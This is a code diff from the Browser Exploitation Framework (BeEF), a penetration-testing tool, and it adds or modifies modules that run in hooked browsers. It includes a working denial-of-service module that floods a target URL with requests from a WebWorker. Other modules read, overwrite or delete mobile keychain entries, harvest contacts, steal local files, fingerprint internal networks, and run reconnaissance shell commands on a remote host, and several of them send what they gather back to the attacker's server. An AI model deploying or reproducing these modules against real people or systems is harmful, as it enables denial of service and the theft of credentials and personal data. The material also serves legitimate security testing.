-	{'name'=>'cmd', 'ui_label' => 'Shell Commands', 'description' => 'Enter shell commands to execute. Note: the ampersands are required to seperate commands', 'type'=>'textarea', 'value'=>'echo User: & whoami & echo Directory Contents: & dir & echo HostName: & hostname & ipconfig & netstat -an', 'width'=>'200px' }
+	{'name'=>'rhost',   'ui_label'=>'Target Address', 'value'=>'127.0.0.1'},
+	{'name'=>'rport',   'ui_label'=>'Target Port',    'value'=>'4444'},
+	{'name'=>'timeout', 'ui_label'=>'Timeout (s)',    'value'=>'30'},
+	{'name'=>'commands','ui_label'=>'Shell Commands', 'description'=>'Enter shell commands to execute. Note: ampersands are required to seperate commands', 'type'=>'textarea', 'value'=>'echo User: & whoami & echo Directory Path: & pwd & echo Directory Contents: & dir & echo HostName: & hostname & ipconfig & netstat -an', 'width'=>'200px' }
     ]
   end
 
   def post_execute
     content = {}
     content['result'] = @datastore['result'] if not @datastore['result'].nil?
-    content['fail'] = @datastore['fail'] if not @datastore['fail'].nil?
-    if content.empty?
-      content['fail'] = 'No data was returned.'
-    end
+    content['fail']   = @datastore['fail']   if not @datastore['fail'].nil?
     save content
   end
 end

modules/misc/local_file_theft/command.js

@@ -219,9 +219,9 @@ result = '';
     function grabFiles(dir,os){
 	    tmpfile = {}
 	    for (i in fileList[os]['post']){
-            console.log('dir = ' + dir);
-            console.log('fileList: ' + fileList[os]['post'][i]);
-		    console.log(i);
+            beef.debug('dir = ' + dir);
+            beef.debug('fileList: ' + fileList[os]['post'][i]);
+		    beef.debug(i);
 		    tmpfile[i] = new XMLHttpRequest()
 		    tmpfile[i].open ('get',dir+"/"+fileList[os]['post'][i]);
 		    tmpfile[i].send();
@@ -229,7 +229,7 @@ result = '';
 		    tmpfile[i].onreadystatechange=function(){
                 for (j in fileList[os]['post']){
 			        if(tmpfile[j].readyState==4){
-                        console.log('new returned for: ' + j);
+                        beef.debug('new returned for: ' + j);
                         result = j +": "+ tmpfile[j].responseText;
                         
                         beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result);

modules/network/DOSer/command.js

@@ -0,0 +1,33 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+    var url = '<%= @url %>';
+    var delay = '<%= @delay %>';
+    var method = '<%= @method %>';
+    var post_data = '<%= @post_data %>';
+
+    if(!!window.Worker){
+    var myWorker = new Worker('http://' + beef.net.host + ':' + beef.net.port + '/worker.js');
+
+    myWorker.onmessage = function (oEvent) {
+        beef.net.send('<%= @command_url %>', <%= @command_id %>, oEvent.data);
+    };
+
+        var data = {};
+        data['url'] = url;
+    data['delay'] = delay;
+    data['method'] = method;
+    data['post_data'] = post_data;
+
+    myWorker.postMessage(data);
+    }else{
+       beef.net.send('<%= @command_url %>', <%= @command_id %>, 'Error: WebWorkers are not supported on this browser.');
+    }
+
+
+});

modules/network/DOSer/config.yaml

@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        doser:
+            enable: true
+            category: "Network"
+            name: "DOSer"
+            description: "Do infinite GET or POST requests to a target, spawning a WebWorker in order to don't slow down the hooked page. If the browser doesn't support WebWorkers, the module will not run."
+            authors: ["antisnatchor"]
+            target:
+                working: ["ALL"]

modules/network/DOSer/module.rb

@@ -0,0 +1,26 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Doser < BeEF::Core::Command
+
+  def pre_send
+    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/network/doser/worker.js', '/worker', 'js')
+  end
+
+  def self.options
+    return [
+    	{'name' => 'url', 'ui_label' => 'URL', 'value' => 'http://target/path'},
+      {'name'=>'delay', 'ui_label' =>'Delay between requests (ms)','value'=>'10'},
+      {'name'=>'method', 'ui_label' =>'HTTP Method','value'=>'POST'},
+      {'name'=>'post_data', 'ui_label' =>'POST data','value'=>'key=value&&Aa=Aa&BB'}
+    ]
+  end
+  
+  def post_execute
+    return if @datastore['result'].nil?
+    save({'result' => @datastore['result']})
+  end
+  
+end

modules/network/DOSer/worker.js

@@ -0,0 +1,45 @@
+var url = "";
+var delay = 0;
+var method = "";
+var post_data = "";
+var counter = 0;
+
+onmessage = function (oEvent) {
+ url = oEvent.data['url'];
+ delay = oEvent.data['delay'];
+ method = oEvent.data['method'];
+ post_data = oEvent.data['post_data'];
+ doRequest();
+};
+
+function noCache(u){
+ var result = "";
+ if(u.indexOf("?") > 0){
+  result = "&" + Date.now() + Math.random();
+ }else{
+  result = "?" + Date.now() + Math.random();
+ }
+ return result;
+}
+
+function doRequest(){
+ setInterval(function(){
+
+  var xhr = new XMLHttpRequest();
+  xhr.open(method, url + noCache(url));
+  xhr.setRequestHeader('Accept','*/*');
+  xhr.setRequestHeader("Accept-Language", "en");
+  if(method == "POST"){
+    xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
+    xhr.send(post_data);
+  }else{
+    xhr.send(null);
+  }
+  counter++;
+
+ },delay);
+
+ setInterval(function(){
+ postMessage("Requests sent: " + counter);
+ },10000);
+}

modules/network/detect_tor/command.js

@@ -14,7 +14,9 @@ beef.execute(function() {
 	img.setAttribute("style","visibility:hidden");
 	img.setAttribute("width","0");
 	img.setAttribute("height","0");
-	img.src = 'http://dige6xxwpt2knqbv.onion/wink.gif';
+	//img.src = 'http://dige6xxwpt2knqbv.onion/wink.gif';
+	//img.src = 'http://xycpusearchon2mc.onion/deeplogo.jpg'
+	img.src = '<%= @tor_resource %>';
 	img.id = 'torimg';
 	img.setAttribute("attr","start");
 	img.onerror = function() {

modules/network/detect_tor/module.rb

@@ -7,6 +7,7 @@ class Detect_tor < BeEF::Core::Command
   
   def self.options
     return [
+    	{'name' => 'tor_resource', 'ui_label' => 'What Tor resource to request', 'value' => 'http://xycpusearchon2mc.onion/deeplogo.jpg'},
         {'name'=>'timeout', 'ui_label' =>'Detection timeout','value'=>'10000'}
     ]
   end

modules/network/internal_network_fingerprinting/command.js

@@ -219,7 +219,7 @@ beef.execute(function() {
 		for(var u=0; u < urls.length; u++) {
 			if(!urls[u][3] && ports != null){ // use default port
 				var img = new Image;
-				//console.log("Detecting  [" + urls[u][0] + "] at IP [" + ips[i] + "]");
+				beef.debug("Detecting  [" + urls[u][0] + "] at IP [" + ips[i] + "]");
 				img.id  = u;
 				img.src = urls[u][2]+"://"+ips[i]+":"+urls[u][1]+urls[u][4];
 				img.onload = function() { if (this.width == urls[this.id][5] && this.height == urls[this.id][6]) { beef.net.send('<%= @command_url %>', <%= @command_id %>,'discovered='+escape(urls[this.id][0])+"&url="+escape(this.src));dom.removeChild(this); } }
@@ -227,7 +227,7 @@ beef.execute(function() {
 			} else { // iterate to all the specified ports
 				for(p=0;p<ports.length;p++){
 					var img = new Image;
-					//console.log("Detecting  [" + urls[u][0] + "] at IP [" + ips[i] + "], port [" + ports[p] + "]");
+					beef.debug("Detecting  [" + urls[u][0] + "] at IP [" + ips[i] + "], port [" + ports[p] + "]");
 					img.id  = u;
 					img.src = urls[u][2]+"://"+ips[i]+":"+ports[p]+urls[u][4];
 					img.onload = function() { if (this.width == urls[this.id][5] && this.height == urls[this.id][6]) { beef.net.send('<%= @command_url %>', <%= @command_id %>,'discovered='+escape(urls[this.id][0])+"&url="+escape(this.src));dom.removeChild(this); } }

modules/phonegap/phonegap_detect/command.js

@@ -17,7 +17,8 @@ beef.execute(function() {
         + " cordova api: " + device.cordova
         + " platform: " + device.platform
         + " uuid: " + device.uuid
-        + " version: " + device.version;
+        + " version: " + device.version
+	+ " model: " + device.model;
     } catch(e) {
         phonegap_details = "unable to detect phonegap";
     }

modules/phonegap/phonegap_geo_locate/command.js

@@ -27,7 +27,7 @@ beef.execute(function() {
     // onError Callback receives a PositionError object
     //
     function onError(error) {
-        console.log('code: '    + error.code    + '\n' +
+        beef.debug('code: '    + error.code    + '\n' +
           'message: ' + error.message + '\n');
     }
 

modules/phonegap/phonegap_globalization_status/command.js

@@ -0,0 +1,34 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+// Phonegap_globalization_status
+//
+beef.execute(function() {
+    var result = '';
+
+    navigator.globalization.getPreferredLanguage(
+  		function (language) {
+  			result = 'language: ' + language.value + '\n';
+        beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result );
+  		}, 
+  		function () {
+  			result = 'language: ' + 'fail\n';
+        beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result );
+  		}
+	);
+
+    navigator.globalization.getLocaleName(
+  		function (locale) {
+  			result = 'locale: ' + locale.value + '\n';
+        beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result );
+  		},
+  		function () {
+  			result = 'locale: ' + 'fail\n';
+        beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result );
+  		}
+	);
+    
+});

modules/phonegap/phonegap_globalization_status/config.yaml

@@ -0,0 +1,17 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+#   Phonegap_globalization_status
+#
+beef:
+    module:
+        phonegap_globalization_status:
+            enable: true
+            category: "Phonegap"
+            name: "Globalization Status"
+            description: "Examine device local settings"
+            authors: ["staregate"]
+            target:
+                working: ["All"]

modules/phonegap/phonegap_globalization_status/module.rb

@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+# // Phonegap_globalization_status
+
+class Phonegap_globalization_status < BeEF::Core::Command
+
+  def post_execute
+    content = {}
+    content['Result'] = @datastore['result']
+    save content
+  end 
+end

modules/phonegap/phonegap_keychain/command.js

@@ -0,0 +1,82 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+// Phonegap_keychain
+//
+beef.execute(function() {
+    var servicename = "<%== @servicename %>";
+    var key = "<%== @key %>";
+    var value = "<%== @value %>";
+    var action = "<%== @action %>";
+    var result = '';
+    var kc = '';
+
+    try {
+        kc = cordova.require("cordova/plugin/keychain");
+    } catch (err) {
+        result = 'Unable to access keychain plugin';
+        beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result ); 
+    }
+
+    function onGet()
+    {  
+        var win = function(value) {
+            result = result + "GET SUCCESS - Key: " + key + " Value: " + value;
+            beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result ); 
+
+        };
+        var fail = function(error) {
+            result = result + "GET FAIL - Key: " + key + " Error: " + error;
+            beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result ); 
+        };
+        
+        kc.getForKey(win, fail, key, servicename);
+
+    }
+    
+    function onSet()
+    {        
+        var win = function() {
+            result = result + "SET SUCCESS - Key: " + key;
+            beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result ); 
+        };
+        var fail = function(error) {
+            result = result + "SET FAIL - Key: " + key + " Error: " + error;
+            beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result ); 
+        };
+        
+        kc.setForKey(win, fail, key, servicename, value);
+    }
+    
+    function onRemove()
+    {
+        var win = function() {
+            result = result + "REMOVE SUCCESS - Key: " + key;
+            beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result ); 
+        };
+        var fail = function(error) {
+            result = result + "REMOVE FAIL - Key: " + key + " Error: " + error;
+            beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result ); 
+        };
+        
+        kc.removeForKey(win, fail, key, servicename);
+    }
+
+    if (kc !== undefined)  {
+        switch(action) {
+            case 'Read':
+                onGet();
+                break;
+            case 'CreateUpdate':
+                onSet();
+                break;
+            case 'Delete':
+                onRemove();
+                break;
+        }
+    } 
+
+});

modules/phonegap/phonegap_keychain/config.yaml

@@ -0,0 +1,17 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+#   Phonegap_keychain
+#
+beef:
+    module:
+        phonegap_keychain:
+            enable: true
+            category: "Phonegap"
+            name: "Keychain"
+            description: "Read/CreateUpdate/Delete Keychain Elements"
+            authors: ["staregate"]
+            target:
+                working: ["All"]

modules/phonegap/phonegap_keychain/module.rb

@@ -0,0 +1,53 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+# Phonegap_keychain
+#
+
+class Phonegap_keychain < BeEF::Core::Command
+  
+    def self.options
+        return [{
+            'name' => 'servicename', 
+            'description' => 'Service name', 
+            'ui_label'=>'Service name', 
+            'value' => 'ServiceNameTest',
+            'width' => '300px'
+            
+            },{
+            'name' => 'key', 
+            'description' => 'Key', 
+            'ui_label'=>'Key', 
+            'value' => 'TestKey',
+            'width' => '300px'
+            },{
+            'name' => 'value', 
+            'description' => 'Value', 
+            'ui_label'=>'Value', 
+            'value' => 'TestValue',
+            'width' => '100px'
+            },{
+            'name' => 'action', 
+            'type' => 'combobox',
+            'ui_label' => 'Action Type',
+            'store_type' => 'arraystore', 
+            'store_fields' => ['action'], 
+            'store_data' => [['Read'],['CreateUpdate'],['Delete']], 
+            'valueField' => 'action', 
+            'value' => 'CreateUpdate', 
+            editable: false, 
+            'displayField' => 'action', 
+            'mode' => 'local', 
+            'autoWidth' => true 
+          }]
+  end
+
+  def callback
+    content = {}
+    content['Result'] = @datastore['result']
+    save content
+  end 
+
+end

modules/phonegap/phonegap_list_contacts/command.js

@@ -0,0 +1,43 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+// phonegap_list_contacts
+//
+beef.execute(function() {
+    var result = '';
+
+    function onSuccess(contacts) {
+
+         for (var i=0; i<contacts.length; i++) {
+            result = contacts[i].displayName;
+            
+            for (var j=0; j<contacts[i].phoneNumbers.length; j++) {
+                result = result + ' #:' + contacts[i].phoneNumbers[j].value;
+            }
+
+            for (var j=0; j<contacts[i].emails.length; j++) {
+                result = result + ' @:' + contacts[i].emails[j].value;
+            }
+
+            beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result );    
+
+        }
+    };
+
+    function onError(contactError) {
+        result = 'fail';
+        beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result ); 
+    };
+
+
+    var options = new ContactFindOptions();
+    options.filter="";
+    options.multiple=true; 
+    var fields = ["displayName", "phoneNumbers", "emails"];
+    
+    navigator.contacts.find(fields, onSuccess, onError, options);
+    
+});